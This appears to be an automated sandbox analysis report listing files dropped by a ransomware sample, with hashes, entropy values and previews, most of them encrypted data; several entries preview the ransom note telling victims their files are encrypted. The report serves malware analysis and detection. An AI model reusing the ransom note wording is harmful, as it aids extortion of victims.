                            SHA-256:64502592FEA6D93AC5ABE0F7DE5993957ECF5A46EB1FB73A8679A90364FF9DAB
                            SHA-512:9D598FE01F56A28C38A3A60466FF27291A4BB95B68EB0FC5A8B93CB9CC415B1DA50B8656845B7262D0CCE0CB0A3950A2F896152E4BA6B1519EAF52DB0B6E7C94
                            Malicious:false
                            Preview:1r...m..}..~1!.J.=.......c.%.I.&l..3J;..p,r...u......W.2...,.$p....(WJ..].W.t_d.....q.N{\..i.%N..'.B...V......T+.-..]..*9_A..3...0.*.._!DM..T...E.J+.....cZ../...nY...s.....:..0.".<.h.BeU.Nh..0).vB.kB7..|,).h...'..?..K&.........R&.....Tx.Vd....:N......^'.!....{..>.....~.g.@.w...-a1>......'.l...../?..ASf..t...2..Y.._fT.Q...i.m...a.........p.$LI.4,....~._..=....?....0o7.6..1..4..."..~.....x..J.:..W..-^2t'o..! ..c.>.....F..6.UA..1....O...'...p..U..k\Z.._.@.1..5p....AF.vUY.J...w...M.)3..+.!..}^.=.F.TN.....e..8.....h...@.p6jV.....~...v<..-.*..B8...a6)U......E.D..9a.............v]*... ."X.x.'=.... +7.S....".\.(.;......s.#..=....|...eU.M.U.....K./.R.ef.o.....@:.'$n.T.{.c>..U.=..'........R.K...(...._...x........s.#...}.....~.5....M0'P..1./.D.E...O. .V..d...W@;bV.h.eH.....Pp..o|...V..WM=.N.@0y.&..N..O.....*.@.9.XL.[W.\..^A._....}..B.i..:|.l80p5..V.E~....F."....nH..;....y9Tv.g..a.X.1.j._w....fa.>.>..U...i...a.ye.I.O...M.dk.\......{ ..;..$.5..4?.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:true
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.85961498539927
                            Encrypted:false
                            SSDEEP:24:7VDEaWSZM3LtXqBhltdplZBmwVPcvpMN5qRfzQoylGiQacmut:7yaWS2bRqBhltd3ZQwVEu0RfzVylhQ6+
                            MD5:793181E66C959E45872ABEA099A7E301
                            SHA1:869CB4AD33D0EACDCE2987DE33FDFC45BDC02BAE
                            SHA-256:37D797964A7E7CA55195C7DD1B1CC6B56F5CEC601C215F89475B6A8127C6A3BE
                            SHA-512:83CEE9E876E2381E1D21A5CBCC2DDD435C3E4EEEAB6B5AD61A33BB409855D9CE09CB6691A7A8CB198DB5642BEF1CAF5950BD0D841F6DCBA15888AEE9FD3892E4
                            Malicious:false
                            Preview:(....n,(D.......^'^A.~lhlo.5...._...7w&e.P.....S....{....Yq.t'..rf...'.......a[,.}d.W&OR._...Rv=....gi.......Q.l....7....."........v.;q..[./.r....<..4..iZ..5$.L...g.e;:=.....Gv....H.....Y..v...z.36..K.J....W.I.*O..SA.....y.Hd.(.A.%v.......w.M..I;....sR.)..\..,.h{..y&......&.E.H`..IQ.b.....z"z4D..$+.....v[.:)%.?...{S7q....A.[..?.%...iG+.......@...%..0...z+E.1.jP.+.D^....T@..9.U L../. .T.\......5KE..>.[.....d.MD..P.X....er......B..@6..V.ny!....K2.0w.|S.....H.u..]M...O.lg.D=ZI.H[...........f.?.>.tdF#.#.%.|$...T.K3.L..4.......,...........).=..|&..G....^.<^N~.,~.a1G...v..Ra.2.......n.=.2S|...8T...-Qb..Hv...Y\.x|..}..W.W...y.P*FK.v6..r.:<....2O.$j}w...i........>=.q..%.......k.#.....|k.88.99..zl.*....9.$.Ml.N.../..d........A..3o...v....c%.b..1..u....QW.R..5!...F.bxt.V.:..Y.....c&Y.E.- ^..5......uL....$<+...ak../....T..l)r:=9.!M6.*.i...+...\.(...z.&..:~..I.....f..G<A+..:.xu.....~a v..\n.Zgw..j.1o._...f...4.........~$..t...Lp]q....m...T?v....&..
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.862788029939309
                            Encrypted:false
                            SSDEEP:24:INjw9cmvJIOLae/GyrRJx3rPmj48tbAFgouNOHO6M1BXghlGiQacmol:IWvyOu6JrPmrtwuNOHdMLXAlhQ6y
                            MD5:3E5C9BF165C60422AE13EF9D739B0924
                            SHA1:74D651CB7A65DB077A09DBC49CFD695A9574CA0B
                            SHA-256:57516D7366BF0C708C1276F67538BB22535FF5382240D52C4C4C8EDD2D6F3029
                            SHA-512:9E1EF8A698E2EB61CB8178D2A8AD128F5DFA505BC48A94C44F18509AE2C395FAC480E82E4125268F961AC4CECAD0F74DEA5AF2C033D3A85C93954E989E960A7B
                            Malicious:false
                            Preview:a..$....].x.'....t.\$sk.g....V.]hI.2..C..e..;M...-;8.h...$...X-.g...{66.x....(.....Sl...?R....]m...7.).....=.(...O:.....o_&...{:w.FO....lg.:V..k.Ee.........p..P#K7-1....,.S.|.ph....-.;g....p....J ....@T.+...\.Uk.+..u...(DiU,G...4o...%`d.-.9......[..e.w..ZW........$..tt.N....,.....{....0K).r....m.|F.Dyr*.."I.[\\.`...e9.G.AA.D%a...@U...r(./.c.......!..,]&..Z..P..:.b......h..".<#..........D.N...1H..&.:J.._.~Ps..q..$k..*..G&.M'.:.e,...v......)....+.~..tH......I..7..6.q...7..U.E.v..;.r_QU..T...Z3..R.C/..>.T 5...sI.@:.0.O...g...3%O.R.|..j..`...G.g...m..K...x..$cc,........C...t.\RcLf....!..Jl......8......Z..:)../.u...J.....;.6..pvd.go...U.T0._P~.n.9{\..p.....z{K.......'......5.+ug .G.v.... ..D....i0&.4..F<J..F.>.7..$.S..b.X..+.c.s...I..xXs.......j.p..<..@......8..<.....U..~..5Z.Y.~"O..........6..=nT.}+~(..a..F..............}."...e...Z.Y.........7DGE...x..xs.k.oO{..B.~-..F].X...s....G...d.0b....W...$.h...z-.!u..*....zv.!ks6.....k.....D..F...
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.837183623204587
                            Encrypted:false
                            SSDEEP:24:PTY57CMoYJtWwmlhC84BsRQIY29sWsWZ/zZSVbW2HlGiQacmlS:PCtKloGR9JsW9zZSVbhHlhQ6lS
                            MD5:E5C4068A204D55592E039D01E5CF373E
                            SHA1:29C5C0EABF7207050327CE15DA58DB58D67B9DD0
                            SHA-256:506988B0F5423D6B8046BC0AE7B62E59B87A757528B34195F6C61AA39928C4DE
                            SHA-512:6145A80411BDCA936A0AB5B562F7C9C62D0D90B5263F16DC3BCE88D67989A89022161B3C2C8D0BFB075F57263FBE241ACB80FE7A96F419A9E9E3413FC01C3EFF
                            Malicious:false
                            Preview:.P..HT.t.-.j....J(qI/o%.gW.G.&R.g.`.A....po.s.q].6.Qc........M_..`2...($A.Y&f..1.........$..5k>..a..a........J./.c..P..N....`..l......].B<..C.PIM...v5.wqF..4x{).(EP.......!.7.....#/4JA.lOu.....X..-..[..TbO....#.}.....z.S...!|]v.J2....3F..ju.}...m[.3s[.1..K /dp.b8..XO......U.;.q9..=.6.g....`...y.A......|.O.g.)=...9...M......w.t]{3....*.5..w.K........n_...f;y..Ebv...(.q....IM,t...... .Fwf}.....".}.....me.i........w..I....sH....s...s....Z.i[x.`....E+...x.U...c'.sd=.....h..Gq.k..:\..+..*..W.7..Tg...+.....9..&o#...*.7.|.....p&*.1..2.t......5.D....RK.n.1.#XB..uey..P..,Fc.p.*.M..o...$...1.' .].... ..3...o..0..U......p.N.\..l.....m[..n...?.,....=.~....r;..!.....";=.P,Uls..F.T.'...T.|T..O....M..y...N.p.tv....]....,....U.}..W..B?..:.(...A4.x..R..gT..._-...I..}C.%]3...i./...../TV..=g_.\..._...30K....B..........&...|qs.]........}.....E....4.].&?..E..>..K.u....~..X...\.........M..#!..{5E..w..kD..%.#.f.mDFd.d.Yp.5..i..F...{..j8..'7....z..D.|T,.t.#
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:true
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.844507834410125
                            Encrypted:false
                            SSDEEP:24:NAUZTiDFJqhJA/8bnwsh0U4CpVSXu6lVYjzFmhHKGvxf9uy+LzlGiQacmpfXw:hZOKjZaUNpVwzlVIDOJ9X+LzlhQ6pfA
                            MD5:AA45A57CE08F3E09F9AC6DAD34A4921B
                            SHA1:A561C7B0DB91E83D2A42E7189064D5E1F78C7535
                            SHA-256:142A638F88E3FE6FD972F208DE0818CD6A9851FD3E0CB9BC6C793D17D095158F
                            SHA-512:4FB12D3984318766E4760441426D6C22DCA9FF0FC089E5FD91218F01B519F00C78C5076DDF657C4077BBB7AFB05373744EDB59CB9827B167DFA33F43F544F953
                            Malicious:false
                            Preview:f.Lx..'$q[....6Rx.m....i`Cq..w.T<...y.N..(.>..7.@.}.?..I..i...e.....M_...&..%....P.......K......A....t.S...m?...$Lf].....,.=...k....g.kj....l.T.....T.'......s.XH...F.8$.D....=i?.J5......X....H..G...7.....@....#..m).k....}+u.x.....*...w.I..$....WtRTYv....g....1-.......i..U....6..B..'j.4..\..7"....t.....^.Fe..C.;../E.K.9.-......'..+.&.q16.`.B7`.............P#.;c..X..Fb66).@.......U.Q.........W....n.2..._.&.My.?..c.......3H0.1_.b.5.9..](:.......q>V.;&y.Ox._....;...}..R.8@.V"....Q.Q?.8..d..Y.R._...........y.8..oF^.8T.....7vH.%..$...U..-..;.......PpxKtZ.'?..w..._..$.j....c...?...X...g...$.s.#.;.....D..D.v)K...J..p.aZ...J.q..SQ4.Z..A4.Q... @...u"...s......N..C.7)..,k)..j.".Mf.....-8M..b....B.GF.+./........D..g.CU0.wK.=.Vq..vR...?.+....k..B....gl>..7.....]..n1....+).c...S...'..e.....I.........._2U.....fW..*Q./....|.......X'3^..PM...%qP...I^t.,z....O1Q<..E...P.R...,............Y.> T...b\IVR....h......"!....e{O.K.p@kV..Kdr.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.851568025016837
                            Encrypted:false
                            SSDEEP:24:0NjIR71PsE8CXwHqg0y8BtUQU5uDjK2gmw49llGiQacmZl:MjC1PkCAKPBtUQRJwWlhQ6b
                            MD5:6E378CBC78909E2B357F83A3CF4E91A2
                            SHA1:6F1D0B3AFEABBAB643850D866DA08AC42B9A42F2
                            SHA-256:D357EE92B321DD3337520D83EDFD85D204007A35A616B768B700F8DF791E6694
                            SHA-512:64BC8D84AB1595331DE3615FEBB5929710588282DBFCB3DA50E6879579ED793F788465C7AF004C4C6935857E40F4F86B56B04975ACB6A1CE6C267893BBD98825
                            Malicious:false
                            Preview:n..[........S.=..Qi...~.......:.N..J...t.Z....mr...Tj5.........;(........u..s...V.b..._...Y..s..l....1.<%o.S.......g..\n.&.....`RG*..."R.._.t..g...e........0.ky......WP1.cu...........Wzj..>,.s...%.5..]..@e..1V3.3.2..Dyzn...h."..4R.[....n"..W.h.u;Q?./aGh.Gv7.?.+{ur..5.$..!..P?Z...a......].D.`.g..H.. .!.b...zj..g...9..$.... ......3[]..{.;....<..:...@=....RR....f..^e..f..~.9..%-.4..e.Z....Cr.2:~.....b.f....-S.....(...S...)..1.....`{..d.\...e.......+....X.G.7.:...Xo.4.2..t..W..\.~.....=b...i...........2.t.:(...F.w...._&r}=dQ.....x.....T...I....m..Z........H.i.:.h...I7..@.I.zf..{......+...a>..r||<'+.o]f.\+d.|.D$p..&.7....#.....F.s....[w..m.l.C;.,.a.'4.s...V.....n....+..|(.... .'..).fe$k.'...+....Rq.V.&c.(v_..8s ....lo.aJ..*5...9._...&nY.i).7iB..s.}.. .........<.]A.r..F.j1..*..,...-..[R.b.6........W.6.X...[W.......3.7..._..&*.E.w.x..heM.........26`...i)u......4H../$;!...V.+...3...r|OCi..0.......#v.o..^9Zc.._...E.G.J.qu...~.4.S.....4.nJ.=_u.K...K.(..O.1.....
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:OpenPGP Public Key
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.831015029186113
                            Encrypted:false
                            SSDEEP:24:pchh1Cuvx0koATdINAk4F2N0jESn6I1jUA5Cy+Qu6lGiQacm61pe/:yT15JIN0lptU23+P6lhQ6IpO
                            MD5:A4A84F39AD34EED02693895F713600FC
                            SHA1:9E564DEF82F21C82940912DB2C1FE9D02A9CC348
                            SHA-256:439CB55A4754FD0B491BCB49755A4DFB5E8511E9D505680130727120EB03C2AC
                            SHA-512:A4AB248898F878933203FDBDED168E8AA518246F4DAE750FE58E9B672633EE9CE24E935BD3B2A369B03643578308146D7F5601BF480664A23374284DAC749E0B
                            Malicious:false
                            Preview:...6.i,..].v%.vi(4.$*.g].F[....sH.t.o...$.`gL..HIM2.......Y.....v^...dJ0.....>bD6....f...}.d........`.$..F.21.9....`.J#ei..+.1G.....0n.9......^@.u.V4.Z!..Me.=~....D...`U=6.6...'...n....%S...8.d.vg.U.Mi;.Zyb...]...e...'......Q....4.%....A ..f.....x.../.A....a.pwc .tg..8H8m#(..a...5..K..^.r..Tb.n.K.s...s...J..2.P[.....*..H.0.C.<W.......Xy.H...aq.......;...u..l.:..e].....Y..*)......S.nx.Q..#...O`....U...Az........hq...K.(..+.`>S.H......kUT...5!M.......^..{...0..!.....u6Tb#m<..........:..D.u...v.i...a^..../t..F.l.Q...5).~.Dc....".,...^.(...bH..0.zB@.6..._.....o]....bJ..0e..Y.~m.......@F.B..Q.."K.R..".....K.a...R..Y...?...Zj.9..(.s.X..9..8w...6........T@+...Y....y.ps..*...r...:Kd)8z}......o.F0....^XH.v\@.(y.........h.+.R;...Y]'.......`..=..P..o.......^8.?....|.0...@.]U.......@..7....{..>i....r.0..N<."...[].hb`_.C...+...?`Z6.+......r@[..v3....U$..~...+s`...........p.>.U.9.W....RjN..b3...-I...mAB....s.6....B}...wY.q.=F.i$..3'W`.d...t..
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.852452489989361
                            Encrypted:false
                            SSDEEP:24:dnXNq6fOz6paM5PllGJ1t41jrAEeEFyOD1zOZXvJYRlGiQacmrIv:JXL/hFllA+sUyOSclhQ6K
                            MD5:7BE47A64670BEF6B974E53D3BE6E4CB1
                            SHA1:0E63BCC6851CFA11F42B9C02E7E666A053F47D4B
                            SHA-256:19B89C072FCE130AA463CFC65F2D83A620920B2529C87A3E42AADB5C3E2510BC
                            SHA-512:DA59D92997524D7311EB7D887504F6BAAEE44A9D068E0BBCB32FE9935E4C5EBC9CAEC60D0C6940D37F01D152A38D34058CF112BABA7C7E0953436ED8DCC58E6A
                            Malicious:false
                            Preview:....z.O......&..wV...s'..w.uE.7....$4..K..M.d.>.....F,..s3....p...'#....?.JT..1.......o..8C$*.<.,.".@GG..:..|.0E.....)n..s=.a=cW..Y.z....[.......S..K'.+...n...R/my..].....+W...r.......6y.....G&J% .4.m8JK....?.?O.l..Q.p9.]..g ..F4.......X...N.(.a&0..h...~.=%K.J..w.L....ZM.&......^+.b..]....E.v......c...N.f..c..............c...Y.y.....ho...T.f.B..(....F.......[.$.~.S.@.K.Xa....W>*.B.x.G.....9...3....`.P0...g.O0Z...X..c.....a@.@5j~J....G..Fe..^n=. ..7pe..:.......1....g3..fk....H.......1..(..-....K.......c..Z./.r..I..3@.'n..+%.#..P.....]..G...]_...~....&.`.N.g.. .l..7Q..}.=G].-....g.y..c.../..d..akK..r.`.1f.....&.$..q.]t...HI.Bk..L.T...Uy.......S....Q...6..5..^>.01a|..A........iGu..4. .\..J......i.%.._E>..$O.:w;.v..0..0...C.Z..._;^....../.u...:..O.E......B...t..f.{eG..u.^]..H.U... .7..C.I..N....v<...T.....$.....Z3$....3.Lp~H_..9H.gG..MA^...jA..u..G........f..0..2:...(..g...t8S....;%`......4GU.Q...<yc.z}...e.......Ar.......$.ne.j6
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.8629425507572615
                            Encrypted:false
                            SSDEEP:24:N5hfAaEqkCJfdduYogtAJOz6XQla9mbleew5KXr2Ti5egVFylGiQacmn4I:N5hoa4CrMiIkzXki5T2lhQ6nx
                            MD5:216A7E62C49FF50BEB065637B99555B1
                            SHA1:C3D7A532011265A38AEBD263FBCB81C4C150C4B0
                            SHA-256:7A088D8FC6BB9CDBDF9F001E8961A84EA193DC877F35C3EBCA1B85E7F576C733
                            SHA-512:B1230DEA2A4BD14069FEED797340BA883BDE8836BEF48132C48DD853EA0A461809D35889DBD99CF04439278B186A9CB04E37091F989FBFADAC28B30BAE5FB444
                            Malicious:false
                            Preview:N*..2....&=...v..c..wEXz...N.2...p[L4..d*..M..r...1oU....)LR..$'.(..r.;...`.[.ex1.y........'./T.....zan.......z.o..Y...Q...#.qF..`..v....a.t.R.rG.B..(#...w@.J..{...A.....{.v....}44..)J.....X..v:q.O..<...#.z:P.Q..X:..N.....`..Y..?<)..1~.ln..\.!.......D..C6-...A....l.).N5Ln]...p.}.O..Bl%...QBH6.5d...z.%.%-vXv\.....<u..9.nM.Q{...#...P...\,.T.w...4.]`N.ic.A.E.`]....t.'m.....u.....3,s.|.&6.......L...+..D.k..1W..'..q8X.jF...;...W........tx....._[...:{U....(..UB.1.VM....s.....yz....4L........I.I%..<<..vr:....R....yo..G.1u<..P`.`H.<v-F...Jh...../...rw-..?...4m..|=...Y..lI.k..`......40[`...^S.c..U...Y..(.et.W....Gh...W..-BL....2AD{>H.(...4.R....l...5.Z."..b.U.O..2..M<o Y.K....?..*.@..e7,q....,...........f.50.U.........H?.}b...\7e...6N.5.k5../4f.mY....I.._..V~...XhQ..'[...; .}.._.....kR{UM....7;...O]3.6T....../.B......?........t3..`.-.wz)..5Gj[sk.....E....E.|S...}..+....E.,..bf.k|..[#[._..4r...W..g*..R.....+......r....V....ZR.A.:.D,N.enF.h..i.U.....a.}31.m~A.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.834705778459772
                            Encrypted:false
                            SSDEEP:24:RztYQdmMps8mUroTmHjbI4LdCUVhF4IwyoFkjH6ulGiQacmHC/:RztYSBVrOmHHzC+Ay16ulhQ6y
                            MD5:5096C80669E18261EDD4CD0EC92F4DA2
                            SHA1:8A3BA7B1744EA1A5057F08288997A98F637F4081
                            SHA-256:72A5262EC923605F458D13FAAEDE473902867729F13E06FBDEE8452B73B848B2
                            SHA-512:1B728763C55BF361EACFF1FF4DF8C442A9302DD28F9D0D3809FB6EBF15BA2F96EA20A5D1ABC0CA1E62CE1EFA9CA6633F7B729963621BB58483DDD3C64D76B961
                            Malicious:false
                            Preview:..+..G..:...Q.Z....:m..+...@......+..I.r...".....?.E.w...M..$.x..P`....".......j..-~....W.|.\.......:Em..E...Y. ...\...y...zL......1..A............4....(.#.V..........=2....QEu..!?....6..).w...P..~.a...........>w..Z...C..\.E....O...\..}..).r,nBE.JC....5....}s.....c.....g^.0F5.i.C..B....x....=..O.}..Sz.2.Qt...\.(pC}Q..?l4vo.L...U{Q....M....E.r.Q......R.D...Ew7h..Y..t.Y~#....7`F.y3r...u.....w..... ....{..rI....j......R.~.oq.Y.d....[.:7.vo}.>X....7...8f.1.Q.G........i..!.xL...X........F..'..7..B.F.X.._?..A..T..z./-........gg...|...wcsx %B.#y[7Z..^.......L._......<n.<....Yp ..E...5..(a.yf.04.......u.......{.=.. .."..\.7............Gz.t.7.@Q.t......!M)(..A...4^ym.A..c.w1}..t.Y`..+....P@...1X.3.....Q..Y^.T....-....h.....(.oAU..S.w=..wJ.o....O.'.......VL..[....6?(~.....K..t.cY...(.C-.'8....Y.......\...f.r.....gX..../.@.x9.q].p....l.p.O!l.y.Jo#&.. ...fd+..`R..q...a......L..>....V./H3D...5.H.:....[aF......wI..r/].S..Yk.."[.b...l I.~..X.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.862947474456661
                            Encrypted:false
                            SSDEEP:24:KZdO1mcf6Mth7VixPIpzaL1C1dYe1+4gPe+UlGiQacmSg:KZzKD9VOszACLYe1+LP4lhQ6x
                            MD5:F068BEDE9D18830CE955DD6270D90BCC
                            SHA1:61C12F7383E216659E68D0903FF3E3A8B12715AE
                            SHA-256:58B766DC261D4E7DF783F16E7CCFB79143230845750BD57404960D6F9696A38C
                            SHA-512:AE4853E215AB2ACCE8005452934CBB8178EA7A3D79FE42D8E57B660B06C2289E34DC24BD8F9B76F24C3AE01208BC8FA8FC516892894D64D3E5B6AB4DB17E05BE
                            Malicious:false
                            Preview:...Z........X..y.Y.zT...iB...x \.."..#O......j#dW.3.. ..B..7...h.9."t^.....'........S..1u>.D/..<uJ...e..A..H..G`<m+.v..^i.5.d.@]U.....W1u.?.0oAD..^....p=C6....y[..Dw_......P.8...N.Zi.qr"...:..,...K...>......{=..CMn..g..T.h}.....9.\..J..4c.@..k..C..hd8+..\o#.Q.y.e..R.Ap........*.9D.....N.......v...]..w[..... .vG.G.A..w......P2@...3ZO..Y..P.8k.:p.o[-)J!2.~....s...*.,..y..w...Z2.fk.#Z.].-...M./][......Ns~...9.z..s.r.T>.(S..2..:.-..mo..HE,..=e8........s._Y.I..s...'...u.........WW..y)...PJ.`..&.'.Um../...S...W.X.../.........o..!.9..j:Q.{.......%...].....8..{.....i..%q.t.!..........[).*...1..V..y.qO.bg&...Ey...d....\^Q.rDz.D...I.:..4b..4..o@k.Q.X...q[_\.e......m.Y.g..&= ....."...B..b=....V.6(w..r.3..<$......P5S.W........F.....X[.W.c....x...=...3..q.|w....0....7..R..M..g.b..W.tB......1......1/..2..ca&....a.[sR...m..Z<..Z..)....S6-fW..|G......z.iO....!...d'k.....4R.rP^N....%GA.|c./..OS.W...0uz..Z...4...J.`. n.S....L.F:]..A.#..R.l.......g.1e.,.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:true
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.859628051431239
